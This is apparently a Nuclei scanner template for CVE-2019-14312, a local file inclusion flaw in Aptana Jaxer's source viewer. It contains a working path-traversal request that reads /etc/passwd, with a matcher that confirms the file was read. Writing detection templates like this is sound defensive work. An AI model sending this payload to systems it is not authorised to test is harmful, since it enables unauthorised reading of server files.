id: CVE-2019-14312 info: name: Aptana Jaxer 1.0.3.4547 - Local File inclusion author: daffainfo severity: medium description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. reference: - https://www.exploit-db.com/exploits/47214 - https://www.cvedetails.com/cve/CVE-2019-14312 - http://packetstormsecurity.com/files/153985/Aptana-Jaxer-1.0.3.4547-Local-File-Inclusion.html - https://github.com/aptana/Jaxer/commits/master classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2019-14312 cwe-id: CWE-22 tags: cve,cve2019,lfi requests: - method: GET path: - "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200